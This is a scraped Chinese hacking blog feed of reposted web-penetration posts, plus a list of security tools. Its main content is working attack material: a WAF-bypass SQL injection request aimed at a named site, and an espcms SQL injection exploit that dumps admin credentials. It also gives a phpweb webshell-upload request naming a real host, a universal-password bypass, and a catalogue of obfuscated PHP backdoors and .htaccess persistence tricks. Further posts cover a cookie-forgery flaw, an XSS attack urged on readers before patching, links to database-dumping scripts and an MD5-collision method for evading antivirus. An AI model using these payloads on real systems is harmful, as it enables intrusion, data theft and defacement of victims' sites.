最佳的75个安全工具
http://zhan.renren.com/hackthewebsite?tagId=142790&page=2&from=pages&checked=true
WEB渗透
创新工厂安全宝安全防护绕过漏洞
漏洞详情
简要描述:
安全宝本质是CND加DDOS防护加web安全防护,其web安全防护功能存在漏洞,可以轻易绕过。
详细说明:
web安全防护就想到于一个WAF,但是WEB应用过于复杂,很容易就能绕过,如安全宝无法防护80SEC所发现的几种攻击方法:参考
http://www.80sec.com/浅谈绕过waf的数种方法.html
漏洞证明:
如下面安全保护的网站www.51qljr.com,如果拦截到SQL注入攻击是405状态,用下面的包发送SQL注入攻击将绕过安全保护。
GET /xinxi/shownews.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.51qljr.com
Pragma: no-cache
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
id=572' and 1=1--
修复方案:
web应用太复杂,还有各种复杂场景可以绕过类似的安全防护。
版权声明:转载请注明来源 rayh4c@乌云
# 黑客
# web渗透
2
分享 回复3 喜欢
Nginx 0day 空字节执行漏洞
Nginx %00空字节执行任意代码(php)漏洞
nginx 0.5.*nginx 0.6.*nginx 0.7 <= 0.7.65nginx 0.8 <= 0.8.37
Possible Arbitrary Code Execution with Null Bytes, PHP, and Old Versions of nginx
Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码
In vulnerable versions of nginx, null bytes are allowed in URIs by default
(their presence is indicated via a variable named zero_in_uri defined in ngx_http_request.h).
Individual modules have the ability to opt-out of handling URIs with null bytes.
However, not all of them do; in particular, the FastCGI module does not.
# 黑客
# web渗透
1
分享 回复 喜欢
同志们~点击一下本站上面的分享按钮吧~~你们给力,我就给力,更多最新最ing 的黑客咨询,技术~关注web渗透小站吧~
# web渗透
# 黑客
1
分享 回复1 喜欢
0day搜索和下载站点
http://mukki.org/
http://www.newreleases.ws/0day/
http://www.wooyun.org/
以后慢慢更新
# web渗透
# 黑客
1
分享 回复 喜欢
Backtrack5 R1-cn蓝盾汉化测试版镜像下载
下载地址:
ed2k://|file|BT5-R1-CN.iso|2265214976|1B1B0C02481141A7E397E36B101E1AAF|h=L5WZNET7TAMXYISSLQDWHP6CR7VD535V|/
安装以及使用说明:
http://115.com/file/aqv3qky6#BackTrack%E4%B8%AD%E6%96%87%E6%8C%87%E5%8D%97V8.pdf
# 黑客
# web渗透
3
分享3 回复6 喜欢
最佳的75个安全工具
最佳的75个安全工具工具:Nessus(最好的开放源代码风险评估工具)
网址:http://www.nessus.org/
类别:开放源码
平台:Linux/BSD/Unix
简介:Nessus是一款可以运行在Linux、BSD、Solaris以及其他一些系统上
的远程安全扫描软件。它是多线程、基于插入式的软件,拥有很好的 GTK界面,能够完成超过1200
项的远程安全检查,具有强大的报告输出能力,可以产生HTML、XML、LaTeX和ASCII文本等格式的安
全报告,并且会为每一个发现的安全问题提出解决建议。
--------------------------------------------------------------------------------
工具:Ethereal(网络协议检测工具)
网址:http://www.ethereal.com/
类别:开放源码
平台:Linux/BSD/Unix/Windows
简介:Ethereal是一款免费的网络协议分析程序,支持Unix、
Windows。借助这个程序,你既可以直接从网络上抓取数据进行分析,也可以对由其他嗅探器
抓取后保存在硬盘上的数据进行分析。你能交互式地浏览抓取到的数据包,查看每一个数据包的摘要
和详细信息。Ethereal有多种强大的特征,如支持几乎所有的协议、丰富的过滤语言、易于查看TCP
会话经重构后的数据流等。
--------------------------------------------------------------------------------
工具:Snort(免费的入侵检测系统)
网址:http://www.snort.org/
类别:
开放源码
平台:Linux/BSD/Unix/Windows
简介:Snort是一款轻量级的网络入侵检测系统,
能够在IP网络上进行实时的流量分析和数据包记录。它不仅能进行协议分析、内容检索、内容匹配,
而且能用于侦测诸如缓冲溢出、隐秘端口扫描、CGI攻击、SMB探测、操作系统指纹识别等大量的攻击
或非法探测。Snort使用灵活的规则去描述哪些流量应该被收集或被忽略,并且提供一个模块化的探测引擎。
--------------------------------------------------------------------------------
工具:Netcat(网络瑞士军刀)
网址:http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows
简介:一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能。
--------------------------------------------------------------------------------
工具:TCPDump/WinDump(用于网络监测和数据收集的优秀嗅探器)
网址:http://www.tcpdump.org/,http://windump.polito.it/
类别:开放源码
平台:Linux/BSD/Unix/Windows
简介:Tcpdump是一款众人皆知和受人喜欢的基于命令行的网络数据
包分析和嗅探工具。它能把匹配规则的数据包的包头给显示出来。你能使用这个工具去查找网络问题或者去监视网络上的状况。WinDump是Tcpdump在Windows平台上的移植版。
--------------------------------------------------------------------------------
工具:Hping2(类似ping的网络探测工具)
网址:http://www.hping.org/
类别:开放源码
平台:Linux/BSD/Unix
简介:hping2能发送自定义的ICMP/UDP/TCP包到目标地址并且显示包的响应情况。它有一
个方便的traceroute模式,并且支持IP分片。这个工具在traceroute、ping和探测防火墙后的主机时特别有用。
工具:Firewalk(高级的traceroute)
网址:http://www.packetfactory.net/projects/firewalk/
类别:开放源码
平台:Linux/BSD/Unix
简介:Firewalk使用类似traceroute的技术来分析IP
包的响应,从而测定网关的访问控制列表和绘制网络图。2002年10月,这个一流的工具在原来的基础
上进行了重新开发。需要注意到的是,Firewalk里面的大多数功能也能由Hping2的traceroute选项来实现。
--------------------------------------------------------------------------------
工具:Cain & Abel(穷人的L0phtcrack)
网址:http://www.oxid.it/cain.html
类别:免费
平台:Windows
简介:Cain & Abel是一个针对Microsoft操作系统的免费
口令恢复工具。它通过如下多种方式轻松地实现口令恢复:网络嗅探、破解加密口令(使用字典或强
行攻击)、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议等。源代码不公开。
--------------------------------------------------------------------------------
工具:
XProbe2(主动操作系统指纹识别工具)
网址:http://www.sys-security.com/html/projects/X.html
类别:开放源码
平台:Linux/BSD/Unix
简介:XProbe是一款测定远程主机操作系统类型
的工具。它依靠与一个签名数据库的模糊匹配以及合理的推测来确定远程操作系统的类型,利用
ICMP协议进行操作系统指纹识别是它的独到之处。
--------------------------------------------------------------------------------------------------------------------------------------------------------------
工具:SolarWinds Toolsets(大量的网络发现、监视、攻击工具)
网址:http://www.solarwinds.net/
类别:商业
平台:Windows
简介:SolarWinds包含大量适合系统管理员做特殊用途的工具,与安全相关的工具包括许多的网
络发现扫描器(network discovery scanner)和一个SNMP强力破解器。
--------------------------------------------------------------------------------
工具:NGrep(方便的包匹配和显示工具)
网址:http://www.packetfactory.net/projects/ngrep/
类别:开放源码
平台:Linux/BSD/Unix/Windows
简介:NGrep在网络层实现了GNU grep的大多数功能,基于pcap,可以使你通过指定扩展的正则表达
式或十六进制表达式去匹配网络上的数据流量。它当前能够识别
流经以太网、PPP、 SLIP、FDDI、令牌网和回环设备上的TCP、UDP和ICMP数据包,并且和其他
常见的嗅探工具(如tcpdump和snoop)一样,理解bpf 过滤机制。
--------------------------------------------------------------------------------
工具:Perl/Python(脚本语言)
网址:http://www.perl.org,http://www.python.org/
类别:开放源码
平台:Linux/BSD/Unix/Windows
简介:当我们使用那些已经开发好的安全工具来处理任务时,别忘了能
自己写出(或修改)安全程序也是一件非常重要的事情。利用Perl和Python
能非常容易地写出用
于系统测试、exploit和修补的脚本程序,使用包含Net::RawIP和协议实现等模块的CPAN
(Comprehensive Perl Archive Network:http://www.cpan.org/)
或类似的档案能帮助我们比较容易地进行相关的开发。
--------------------------------------------------------------------------------
工具:THC-Amap(应用程序指纹识别扫描器)
网址:http://www.thc.org/releases.php
类别:开放源码
平台:Linux/BSD/Unix
简介:由THC开发的Amap是一个功能强大的扫描器,它通过探测端口响应的
应用程序指纹数据来识别应用程序和服务,远甚于通过缺省端口号来判断应用程序和服务的方法。
--------------------------------------------------------------------------------
工具:OpenSSL(最为重要的SSL/TLS加密库)
网址:http://www.openssl.org/
类别:开放源码
平台:Linux/BSD/Unix/Windows
简介:OpenSSL项目是共同努力开发出来的一个健全的、商业级的、
全开放的和开放源代码的工具包,用于实现接层协议(SSL v2/v3)和传输层安全协议(TLS v1)
以及形成一个功效完整的通用加密库。该项目由全世界范围内志愿者组成的团体一起管理,
他们使用Internet去交流、设计和开发这个 OpenSSL工具和相关的文档。
工具:NTop(网络使用状况监测软件)
网址:http://www.ntop.org/
类别:开放源码
平台:Linux/BSD/Unix/Windows
简介:Ntop是一款显示网络使用状况的流量监测软件,类似于
UNIX平台上监视系统进程的top命令。在交互模式下,ntop会将网络的使用状况显示在用户的终端上;
在Web模式下,ntop会做为一个web服务器,创建包含网络状况的HTML网页返回给用户。
--------------------------------------------------------------------------------
工具:Nemesis(命令行式的UNIX网络信息包插入套件)
网址:http://www.packetfactory.net/projects/nemesis/
类别:开放源码
平台:Linux/BSD/Unix
简介:Nemesis项目是为了开发一个UNIX/Linux系统上基于命令行的、方便人们使用的IP栈,
它可以自定义数据包、插入数据包、进行协议攻击等,
是一个很好的测试防火墙、入侵检测系统、路由器和其他网络设备的工具。如果你对Nemesis感兴趣,
那么你也可能需要看看hping2,这两者补相互之不足。
--------------------------------------------------------------------------------
工具:LSOF(列出打开的文件)
网址:ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/
类别:
开放源码
平台:Linux/BSD/Unix
简介:LSOF是针对Unix的诊断和分析工具,它能显示出由
系统里正在运行的进程所打开的文件,也能显示出每一个进程的通讯socket。
-------------------------------------------------------------------------------
工具:Hunt(Linux平台上高级的包嗅探和会话劫持工具)
网址:http://lin.fsid.cvut.cz/~kra/index.html#HUNT
类别:开放源码
平台:Linux
简介:Hunt能监视、劫持、重设网络上的TCP连接,
在以太网上使用才有作用,并且含有监视交换连接的主动机制,以及包括可选的ARP转播和劫持成功
后的连接同步等高级特征。
--------------------------------------------------------------------------------
工具:Honeyd(你个人的honeynet,http://www.honeynet.org/)
网址:http://www.citi.umich.edu/u/provos/honeyd/
类别:开放源码
平台:Linux/BSD/Unix/Windows
简介:Honeyd是一个能在网络上创建虚拟主机的小小后
台程序,虚拟主机能被配置成运行任意的服务,并且洽当的服务TCP特性以致他们看起来就像是运行
在某个特定版本的操作系统上。Honeyd能在一个模拟的局域网环境里让一台主机配有多个地址,并且
可以对虚似主机进行ping、traceroute。虚拟主机上任何类型的服务都可以依照一个简单的配置文
件进行模拟。Honeyd也可以对一台主机做代理服务,而不是模拟它。
--------------------------------------------------------------------------------
工具:Achilles(可以修改http会话包的代理程序)
网址:http://packetstormsecurity.nl/filedesc/achilles-0-27.zip.html
类别:开放源码
平台:Windows
简介:Achilles是一个设计用来测试web应用程序安
全性的工具。它是一个代理服务器,在一个HTTP会话中扮演着“中间人”(man-in- the-middle)的角
色。一个典型的HTTP代理服务器将在客户浏览器和web服务器间转发数据包,但Achilles却载取发向任
一方的HTTP 会话数据,并且在转发数据前可以让用户修改这些数据。
--------------------------------------------------------------------------------
工具:Brutus(网络认证的强行破解工具)
网址:http://www.hoobie.net/brutus/
类别:免费
平台:Windows
简介:Brutus是一款对远程服务器的网络服务进行口令猜解的工具,支持字典攻击和组合攻击,
支持的网络应用包括HTTP、POP3、FTP、SMB、TELNET、IMAP、NTP等。源代码不公开。
UNIX系统上的THC-Hydra有类似的功能。
--------------------------------------------------------------------------------
工具:Stunnel(一个多种用途的SSL加密外壳)
网址:http://www.stunnel.org/
类别:开放源码
平台:Linux/BSD/Unix/Windows
简介:Stunnel程序被设计用来做为本地客户端和远程服务器间的SSL加
密外壳。它能在POP2、POP3、IMAP等使用inetd后台进程的服务器上增加SSL功能,并且不会影响
到程序源代码。它使用OpenSSL或SSLeay库建立SSL会话连接。
--------------------------------------------------------------------------------
工具:Paketto Keiretsu(极端的TCP/IP)
网址:http://www.doxpara.com/paketto
类别:开放源码
平台:Linux/BSD/Unix
简介:Paketto Keiretsu是一组使用新式的不常见的策略去操作TCP/IP网
络的工具集合,开发的最初本意是为了在现有TCP/IP架构里去实现一些功能,但现在已经远远超出
了最初的本意。包含的工具有:Scanrand,一个罕见的快速的网络服务和拓朴发现系统;Minewt,一
个NAT/MAT路由器; linkcat,把以太网链路做为标准的输入输出;Paratrace,不产生新的连
接就能追踪网络路径;Phentropy,使用OpenQVIS在三维拓朴空间里能绘制出任意总量的数据源图形。
工具:Fragroute(破坏入侵检测系统最强大的工具)
网址:http://www.monkey.org/~dugsong/fragroute/
类别:开放源码
平台:Linux/BSD/Unix/Windows
简介:Fragroute能够截取、修改和重写向外发送的报文,
实现了大部分的IDS攻击功能。Fragroute起重要作用的是一个简单的规则设置语言,以它去实现延迟
、复制、丢弃、碎片、重叠、打印、重排、分割、源路由或其他一些向目标主机发送数据包的攻击。
这个工具开发的本意是去测试入侵检测系统、防火墙、基本的TCP/IP栈的行为。像Dsniff、Libdnet
一样,这个优秀的工具也是由Dug Song开发的。
--------------------------------------------------------------------------------
工具:SPIKE Proxy
网址:http://www.immunitysec.com/spikeproxy.html
类别:
开放源码
平台:Linux/BSD/Unix/Windows
简介:Spike Proxy是一个开放源代码的HTTP代
理程序,用于发现web站点的安全缺陷。它是Spike应用程序测试套件
(http://www.immunitysec.com/spike.html)的一部份,支
持SQL插入检测、web站点检测、登录表单暴力破解、溢出检测和字典穷举攻击检测等。
-------------------------------------------------------------------------------
工具:THC-Hydra(网络认证的破解工具)
网址:http://www.thc.org/releases.php
类别:开放源码
平台:Linux/BSD/Unix
简介:这个工具能对需要网络登录的系统进行快速的字典攻击,
包括FTP、POP3、IMAP、Netbios、Telnet、HTTP Auth、LDAP NNTP、VNC、ICQ、Socks5、PCNFS等,
支持SSL,并且现在是Nessus风险评估工具的一部份。
--------------------------------------------------------------------------------
其他的25个最佳安全工具:
OpenBSD,http://www.openbsd.org/:安全可靠的操作系统。
TCP Wrappers,ftp://ftp.porcupine.org/pub/security/index.html:一流
的IP访问控制和日志的实现机制。
pwdump3,http://www.polivec.com/pwdump3.html:
获取本地或远程Windows主机的口令哈希,而不管是否安装了syskey。
LibNet,http://www.packetfactory.net/libnet/: 允许程序员去构造
和插入网络数据包的高水平开发函数库.
IpTraf,http://cebu.mozcom.com/riker/iptraf/: IP网络监控软件。
Fping,http://www.fping.com/:一次可以ping多个IP地址的扫描程序。
Bastille,http://www.bastille-linux.org/:增强系统安全性的脚本程序,支持Linux,
Mac OS X和HP-UX操作系统。
Winfingerprint,http://winfingerprint.sourceforge.net/: 一款基于Win32的
高级远程系统扫描器。
TCPTraceroute,http://michael.toren.net/code/tcptraceroute/:使用TCP SYN
包实现traceroute的工具。
Shadow Security Scanner,http://www.safety-lab.com/en2/products/1.htm:一款商业化
的风险评估工具。
pf,http://www.benzedrine.cx/pf.html:OpenBSD系统内很有特色
的包过滤防火墙。
LIDS,http://www.lids.org/:Linux内核上的入侵检测和入侵防御系统。
hfnetchk,http://www.microsoft.com/technet/treeview/default.asp?
rl=/technet/security/tools/tools/hfnetchk.asp:微软发布的用于
检查网络上Windows主机
补丁安装情况的工具。
etherape,http://etherape.sourceforge.net/:继流量监测软件etherman之后又一个
支持unix的图形化网络状况监测软件。
dig,http://www.isc.org/products/BIND/:Bind附带的DNS查询工具。
Crack/Cracklib,
http://www.users.dircon.co.uk/~crypto/:一流的本地口令破解器。
cheops/cheops-ng,http://www.marko.net/cheops/,
http://cheops-ng.sourceforge.net/:
绘制本地或远程网络的网络图,并且也能识别主机的操作系统类型。
zone alarm,
http://www.zonelabs.com/:Windows平台上的个人防火墙软件。
Visual Route,http://www.visualware.com/visualroute/index.html:
获取traceroute/whois数据,并且绘制出数据包经过的网络路线在世界地图上的位置。
The Coroner`s Toolkit (TCT),http://www.fish.com/tct/:运行于Unix系统上的
文件系统检查及紧急修复工具集。
tcpreplay,http://tcpreplay.sourceforge.net/:
能把tcpdump或snoop保存下来的流量监测文件在任意点进行回放的工具。
snoop,http://www.spitzner.net/snoop.html:Solaris系统附带的
网络嗅探工具。
putty,
target=_blank>http://www.chiark.greenend.org.uk/~sgtatham/putty/:
Windows平台上优秀的SSH客户端。
pstools,http://www.sysinternals.com/ntw2k/freeware/pstools.shtml:
一套用于管理Windows系统的免费命令行工具。
arpwatch,http://www-nrg.ee.lbl.gov/:主要用来检测
mac地址和ip地址对应关系的工具
# 黑客
# web渗透
3
分享2 回复3 喜欢
【转载】土司真抠门免费了把多年的tuo裤脚本都送出来了
昨天小狼想我问Oracle的脱裤脚本我看看貌似土司都木有我发个集合的吧
mssql
mysql
Oracle
的全部打包了
下载地址:
http://www.ctdisk.com/file/3289059
# 黑客
# web渗透
2
分享 回复 喜欢
【转载】浅析php后门木马
php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢?
本文为您浅析说明一些php后门木马常用的函数
php后门木马常用的函数大致上可分为四种类型:
1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
1. 执行系统命令:
system 函数
//test.php?cmd=ls
system($_GET[cmd]);
passthru 函数
//test.php?cmd=ls
passthru($_GET[cmd]);
shell_exec 函数
//test.php?cmd=ls
echo shell_exec($_GET[cmd]);
exec 函数
//test.php?cmd=ls
$arr = array();
exec($_GET[cmd],$arr);
print_r($arr);
popen 函数
//test.php?cmd=ls
$handle = popen('$_GET[cmd], 'r');
$read = fread($handle, 2096);
echo $read;
pclose($handle);
proc_open 函数
//test.php?cmd=ls
$descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w'),
);
$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
fclose($pipes[0]);
$output = array();
while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
print_r($output);
2. 代码执行与加密:
eval 函数
//最常见的一句话木马
eval($_POST[cmd]);
base64_decode 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
gzinflate 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
gzuncompress 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
gzdecode 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));
str_rot13 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST[cmd]);
eval(str_rot13('riny($_CBFG[pzq]);'));
assert 函数
//类似eval函数
assert($_POST[cmd]);
call_user_func 函数
//使用call_user_func调用assert
call_user_func('assert',$_POST[cmd]);
call_user_func 函数
//使用call_user_func调用任意函数
//test.php?a=assert&cmd=phpinfo()
call_user_func($_GET[a],$_REQUEST[cmd]);
组合代码
//组合方式调用任意函数
//test.php?a=assert&cmd=phpinfo()
$_GET[a]($_REQUEST[cmd]);
3. 文件包含与生成:
require 函数
//包含任意文件
//test.php?file=123.jpg
require($_GET[file]);
require_once 函数
//包含任意文件
//test.php?file=123.jpg
require_once($_GET[file]);
include 函数
//包含任意文件
//test.php?file=123.jpg
include($_GET[file]);
include_once 函数
//包含任意文件
//test.php?file=123.jpg
include_once($_GET[file]);
file_get_contents 函数
//读取任意文件
//test.php?f=config.inc.php
echo file_get_contents($_GET['f']);
file_put_contents 函数
//生成任意内容文件
//a=test.php&b=<?php eval($_POST[cmd]);?>
file_put_contents($_GET[a],$_GET[b]);
fputs 函数
//生成任意内容文件
//a=test.php&b=<?php eval($_POST[cmd]);?>
fputs(fopen($_GET[a],"w"),$_GET[b]);
4. .htaccess:
SetHandler
//可将php代码存于非php后缀文件,例: x.jpg
//将以下代码写入.htaccess中
//连接x.jpg即可启动后门木马
<FilesMatch "x.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
auto_prepend_file
//可将php代码存于非php后缀文件,例: 123.gif
//将以下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门木马
//可在不更改站点源代码的情况下记录所有$_REQUEST的值,也可批量挂马
php_value auto_prepend_file c:/apache2/htdocs/123.gif
auto_append_file
//类似auto_prepend_file
//可将php代码存于非php后缀文件,例: 123.gif
//将以下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门木马
php_value auto_append_file c:/apache2/htdocs/123.gif
另外也针对以上特征码写了一个php web版线上扫描工具
http://www.t00ls.net/viewthread.php?tid=18951
# 黑客
# web渗透
4
分享1 回复 喜欢
【转载】科迅官方XSS漏洞
用户后台发信箱标题直接插入JS脚本S
收信者即会中招,偶对管理员进行了测试! 不过2分钟就收到信了!
科迅CMS会将用户、密码、认证码存入COOKIE。。。
然后你懂得!!!
漏洞已反馈,发帖之时还未修复,想X的童鞋速度!
# 黑客
# web渗透
1
分享 回复 喜欢
大家帮忙推荐推荐啊~~人越多才有精气神来发0day!!大家给力才是真的给力!
# web渗透
1
分享 回复7 喜欢
[【转载T00ls】] 随风分类信息程序1.4COOKIES欺骗
[【原创】] 随风分类信息程序1.4COOKIES欺骗
admin/index.php
01
<? require_once("../conn.php");?>
02
<?
03
$user=cstr($_POST["user"]);
04
$pass=cstr($_POST["pass"]);
05
if($_GET["post"]=="action"){
06
07
$sql=mysql_query("select * from config where s_user='".$user."' and s_pass='".$pass."'");
08
$rs=mysql_fetch_array($sql);
09
if($rs["id"]==""){
10
echo "<script>alert('用户名或密码错误,请从新输入! (默认密码是:123456)');window.location.href='index.php';</script>";
11
exit;
12
}else{
13
setcookie("admin","windows250523691",time()+3600);
14
echo "<script>window.location.href='admin.php';</script>";
15
exit;
16
}
17
18
19
}
setcookie("admin","windows250523691",time()+3600);
# 黑客
# web渗透
2
分享 回复 喜欢
[【Exp】] espcms 0day
为证明我一直默默在T00LS..
发个小0day!!
百度关键字:inurl:index.php?ac=article&at=read&did=
注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆用户名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密码:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
# 黑客
# web渗透
# 牛b
1
分享 回复1 喜欢
phpweb 注射、上传、安装文件漏洞、万能密码
############################################################################## Title: phpweb 注射、上传、安装文件漏洞、万能密码# Time:2011-10-15# Team: # Author: lostowlf#############################################################################home: hi.baidu.com/nginxshell-----------------------exploit-------------------******sqlinjection******* http://www.phpweb.net/down/class/index.php?myord=1{sqlinjection}http://www.phpweb.net/photo/clas ... mp;key=&myord=1 {sqlinjection}***********getshell********POST /kedit/upload_cgi/upload.php HTTP/1.0www.90sec.org" Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*Referer: http://phpweb.net/news/admin/new ... p;pid=all&page= Accept-Language: zh-cnContent-Type: multipart/form-data; boundary=---------------------------7db516c0118UA-CPU: x86Pragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: lib.jlnu.edu.cnProxy-Connection: Keep-AliveCookie: CODEIMG=6878; SYSZC=c7646d833635a773e6a89e364d9f0eca; SYSUSER=wlf; SYSNAME=%E7%8E%8B%E7%AB%8B%E5%B3%B0; SYSUSERID=15; SYSTM=1318373657- D1 F$ M( R3 _8 {3 U. VContent-Length: 6620-----------------------------7db516c0118Content-Disposition: form-data; name="fileName"201110121318373662005.php;.jpg-----------------------------7db516c0118Content-Disposition: form-data; name="attachPath"news/pics/-----------------------------7db516c0118Content-Disposition: form-data; name="fileData"; filename="C:\6.gif"Content-Type: image/gifgif89a<?php fputs(fopen('test.php','w'),'<?php eval($_POST[lostwolf])?>');?>*********install file:**********http://www.url.com/base/install/*********admin********www.url.com/admin.phpusername: admin 'or '1'='1username: admin 'or '1'='1-----------------------exploit end -------------------
# web渗透
# 黑客
# python
1
分享 回复 喜欢
使用 MD5 碰撞算法伪装木马,躲过杀毒软件查杀,加入360白名单
MD5 碰撞算法伪装木马,躲过杀毒软件查杀,加入360白名单。MD5 碰撞发生器 v1.5,fastcoll_v1.0.0.5.exe,MD5 Collision Generator v1.5,根据王小云教授的算法写的MD5碰撞的程序。
快速MD5碰撞生成器,王小云改进版。这个生成器根据“构造前缀碰撞法”可以生成两个不同的文件,而这两文件的md5 sum却是一样的。
构造前缀碰撞法可制作两个内容不同但具有相同MD5验证码的文件。
----------------------------------------------------------------
刚才在 T00ls.net 看到个帖子,内容如下(内容有修改,去除了一些不重要的回帖):
楼主:
年前购买了一个免杀远*,300¥一个月,免杀效果确实牛B,过国内外主流杀软,在手3个月都没杀,大概5月份360更新后要提示了,然后联系客服更新,这样陆陆续续更新了几次,效果都很好,9月底,360更新后全部杀了,然后联系客服,客服说以前的技术被360分析出来了,然后让我们等待2周时间,那边技术在研发新的技术,国庆节后客服发过来一个更新的远*,我测试以后都过,在360进程查看器和网络连接查看都提示文件安全,但过了一天360又报文件为木马文件,我再次联系客服,客服让等1个小时,所技术正在解决,然后一个小时后,360又不杀了,提示安全(注:马还是以前的马,没有更新过,MD5这些都是一样的!)
难道远控的技术和360!!!,
求解!!!
楼主:
我想了解的是 为什么360杀了,然后一个小时后,同样的文件360又不杀了,其他什么认证,地下工作者我就不想去了解了
路人甲:
二种可能 360内部人卖马,360被日了
路人乙:
1.360内部人卖马
2.360被日了
3.lz傻了?
路人丙:
360收黑钱,不干人事,鉴定完毕。
还有你把这个马发别人那看杀不
楼主:
回复 路人丙
都不杀,已经测试过了
路人丁:
万一是远控的云端也在做某种远程更新呢?不能说MD5不变,就是有JQ,无凭无据。
路人戊:
exe的MD5不变,不代表exe肯定不下载新的DLL或其他的模块吧?
本人回复:
应该是认证环节 被人有空子可钻。。
本人回复:
我认为,最有可能的是认证环节,也就是360的白名单认证制度。
前提条件是,360是使用标准MD5值进行程序唯一性验证。
但MD5有个问题就是,碰撞算法,可以产生两个MD5相同、但功能不相同的程序。
把正常的程序提交上去后,让360认证,认证完毕,加到白名单,另外那个也“免杀”了。
据我所知,一年前(实际上是2005年左右的)出了一个东西,自动生成一样MD5值的程序的工具。
而且貌似支持根据指定程序生成一个一样MD5值的程序。
如果360不是使用标准MD5的话,其他算法也有此可能。
本人回复:
MD5 Test_A.exe:与 B 的 MD5 相同,但功能不同。
MD5 Test_B.exe:与 A 的 MD5 相同,但功能不同。
---------------------------------------------
MD5 Test_A.exe:
MD5:F9E99485F226E07627D5180EF95FA473
大小:20.1 KB (20,608 字节)
MD5 Test_B.exe:
MD5:F9E99485F226E07627D5180EF95FA473
大小:20.1 KB (20,608 字节)
(2011-10-11 5:48:05 补充:然后我跑去写了个小程序,MD5值一样,但功能不同,原帖以附件的形式存在,这里我给出下载地址。)
MD5_碰撞测试程序_示例程序.rar:http://115.com/file/clonsfie
实际上从2004年8月17,我国山东大学王晓云教授破解MD5的论文发布后,关于这个MD5碰撞算法的话题就不断,几年之后,就没人讨论了,在我们这一代很多人都没听说过,我也是一两年前知道MD5碰撞算法,当时查阅了部分资料,了解了个大概。
我又把这个话题拉出来讨论下,不过这次是讨论的木马免杀方面的。。。实际上也和免杀无关,只是从免杀想到的。
如上贴内容所示,如果能成功伪造MD5,那么躲过杀毒软件查杀,甚至加入白名单,都不是问题了。
题外话:我不知道360是不是使用的标准MD5算法验证文件的,我从没注意过。如果是的话,那么,现在杀毒软件中好像就只有360这个白痴还使用标准MD5算法验证文件……
不过从以下内容来看、、360还真的是用MD5算法验证文件的、、、真坑爹……
以下内容转自几年前其他人发表的文章:
以下是引用片段:
原来我总是很自信地以为:你有本事找到 MD5 的碰撞又如何?你难道还有本事让两个可执行文件的 MD5 一样,却又都能正常运行,并且可以做完全不同的事情么?
答:还真的可以.
http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe
http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe
这两个程序会在屏幕上打印出不同的字符,但是它们的 MD5 都是一样的。
通读其论文后摘要如下:
这几位密码学家使用的是“构造前缀碰撞法”(chosen-prefix collisions)来进行此次攻击(是王小云所使用的攻击方法的改进版本)。
他们所使用的计算机是一台 Sony PS3,且仅用了不到两天。
他们的结论:MD5 算法不应再被用于任何软件完整性检查或代码签名的用途。
